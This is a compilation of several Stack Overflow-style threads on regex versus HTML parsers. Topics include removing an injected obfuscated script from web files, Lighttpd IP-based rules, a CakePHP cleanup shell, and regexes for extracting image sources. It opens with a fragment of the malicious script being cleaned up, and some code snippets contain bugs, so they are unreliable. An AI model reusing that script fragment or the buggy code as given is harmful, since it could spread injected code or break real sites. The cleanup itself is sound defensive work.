String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, please, anyone can help to match the new line and the "" text??
Thank you in advance.

Indeed you shouldn't use regex for this task. As has been told many times in SO regex are not the proper tool for dealing with HTML manipulations as it is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup for achieving your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;
public class RemoveScript {
public static void main(String args[]){
String viralContent = "Your viral content";
String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
Document doc = Jsoup.parse(inputText);
Elements scripts = doc.select("script");
for(Element element : scripts) {
for (Node child: element.childNodes()) {
if (child instanceof DataNode) {
String content = ((DataNode) child).getWholeData();
if (content.equals(viralContent)) {
element.remove();
}
}
}
}
System.out.println(doc.toString());
}
}
I'm sure other parsers can do the same very easily too.

Set different Lighttpd vhost for internal LAN clients - possibly just RegEx required...?

I want Lighttpd to display a different page for internal clients and the default page for everyone else.
Between these two links, I have an idea of what I want to do but am not sure of the RegEx I would need to restrict clients using a hostname of [http://]192.168.0.? or [http://]192.168.?.? to a different page. I've been using the following code in lighttpd.conf:
server.document-root = "/var/www/sites"
$HTTP["host"] == "RegExHere" {
server.document-root = "/var/www/setup"
}
...where for 'RegExHere' I have tried a variety of attempts such as:
192\.168\.0\.\d{1,3}(\s|$))+
192\.168\.
[192.168.[0-9]+.]
192\.168\.[0-9]+.[0-9]+$
...and various combinations thereof. I have no idea whether I'm close, but regardless it only shows me the default page.
Can anyone advise where I may be going wrong please?
Thanks in advance!

You have to use the =~ syntax to match a regex. Change $HTTP["host"] == "RegExHere" to $HTTP["host"] =~ "RegExHere" and one of those regexs should work. ^192\.168\.\d{1,3}\.\d{1,3}$ should do it.
Found this article on it http://blog.evanweaver.com/2006/06/07/regular-expressions-in-lighttpd-host-redirects/
edit: I think you need to use $HTTP["remoteip"] instead of $HTTP["host"] and it looks like you can do it without regexes.
$HTTP["remoteip"] == "10.0.0.0/8" { url.access-deny = ("") }
$HTTP["remoteip"] == "127.0.0.0/8" { url.access-deny = ("") }
http://forum.lighttpd.net/topic/27

CakePHP 1.3: Way to removed a specific string from a text - PHP Function or Regular Expression

I migrated a News database into a CakePHP news site I am creating. I have a problem with displaying the text from those migrated news because in the text that was imported to DB there were HTML tags that controls the text within them.
Could anyone help me find a way to remove these texts without compromising the layout of those same news?
Basically, I would like to accomplish the following:
Create a ONE-Time Use only function that I can include in my ArticlesController
For example the function name would be function fixtext(){...}
When I call this function from lets say http://mydomain.com/articles/fixtext, all the affected rows in the Article.body column would be scanned and fixed.
The section of text I want to remove is font-size: 12pt; line-height: 115%;, which in within the <span>...</span> tag.
I had something in mind like this, but I am not sure how to implement it
function fixtext(){
$this->autoRender = 'FALSE';
$articles = $this->Article->find(
'all',
array(
'fields' => array(
'Article.body',
'Article.id'
),
'recursive' => -1
)
);
foreach($articles as $article){
// Per Dunhamzzz suggestion
$text = str_replace('font-size: 12pt; line-height: 115%;', '', $article['Article']['body']);
$this->Article->id = $article['Article']['id'];
$this->Article->saveField('Article.body', $text);
}
$this->redirect('/');
}
I am not sure how to approach this, and what is the best way.

Firstly, I would personally create a shell to accomplish this as it is a batch job and (depending on the amount of records involved) you may hit Apache's request timeout limit. Also, it's a good (fun) learning experience and the shell can be extended to perform future maintenance tasks.
Secondly, it is a bad idea to parse HTML using (greedy) regular expressions due to the fact it may be malformed. It is safer to use an HTML parser or using simple string replacements instead but, if it is a small regular string that can be pattern matched safely (ie. your not trying to remove the closing </span> tags), regular expressions can work.
Something like this (untested):
// app/vendors/shells/article.php
<?php
/**
* Maintenance tasks for Articles
*/
class Article extends Shell {
/**
* Clean HTML in articles.
*/
public function cleanHtml(){
// safety kill switch (comment before running)
$this->quit('Backup the `articles` table before running this!');
// this query will time out if you have millions of records
$articles = $this->Article->find('all', array(
'fields' => array(
'Article.name',
'Article.body',
'Article.id'
),
'recursive' => -1,
));
// loop and do stuff
foreach ($articles as $article) {
$this->out('Processing ' . $article['Article']['name'] . ' ... ');
$article['Article']['body'] = $this->_removeInlineStyles($article['Article']['body']);
$this->Article->id = $article['Article']['id'];
$saved = $this->Article->saveField('body', $article['Article']['body']);
$status = ($saved) ? 'done' : 'fail';
$this->out($status);
}
}
/**
* Removes inline CSS styles added by naughty WYSIWYG editors (or pasting from Word!)
*/
protected function _removeInlineStyles($html) {
$html = preg_replace('/ style="[^"']+"/gi', '', $html);
return $html;
}
}

You can use a simple str_replace() to cut that piece of text out.
foreach($articles as $article){
$this->Article->saveField(
'Article.body' => str_replace('font-size: 12pt; line-height: 115%;', '', $article['Article']['body']),
'Article.id' => $article['Article']['id']
);
}
This is pending the text is the same in each case, otherwise you will need something a bit more complicated with regular expressions (or maybe multiple str_replace() calls to remove each bad property).

How do I extract HTML img sources with a regular expression?

I need to extract the src element from all image tags in an HTML document.
So, the input is an HTML page and the output would be a list of URL's pointing to images:
ex... http://www.google.com/intl/en_ALL/images/logo.gif
The following is what I came up with so far:
<img\s+src=""(http://.*?)
This does not work for tags where the src isn't directly after the img tag, for example:
<img height="1px" src="spacer.gif">
Can someone help complete this regular expression? It's pretty easy, but I thought this may be a faster way to get an answer.

The following regexp snippet should work.
<img[^>]+src="([^">]+)"
It looks for text that starts with <img, followed by one or more characters that are not >, then src=". It then grabs everything between that point and the next " or >.
But if at all possible, use a real HTML parser. It's more solid, and will handle edge cases much better.

You don't want to do that. Correctly parsing HTML is a very complex problem, and regular expressions are not a good tool for that.
See e.g.
Can you provide some examples of why it is hard to parse XML and HTML with a regex?
And here for a good solution:
How do I programatically inspect a HTML document

You could do this pretty easily with Javascript. An example would be like below:
var images = document.getElementsByTagName("img");
for (i=0; i < images.length; i++)
{
// get image src
var currImage = images[i].src;
// do link creation here
}

This works great for me
$regexp = '<img[^>]+src=(?:\"|\')\K(.[^">]+?)(?=\"|\')';
if(preg_match_all("/$regexp/", $content, $matches, PREG_SET_ORDER)) {
if( !empty($matches) ) {
for ($i=0; $i <= count($matches); $i++)
{
$img_src = $matches[$i][0];
echo $img_src;
}
}
}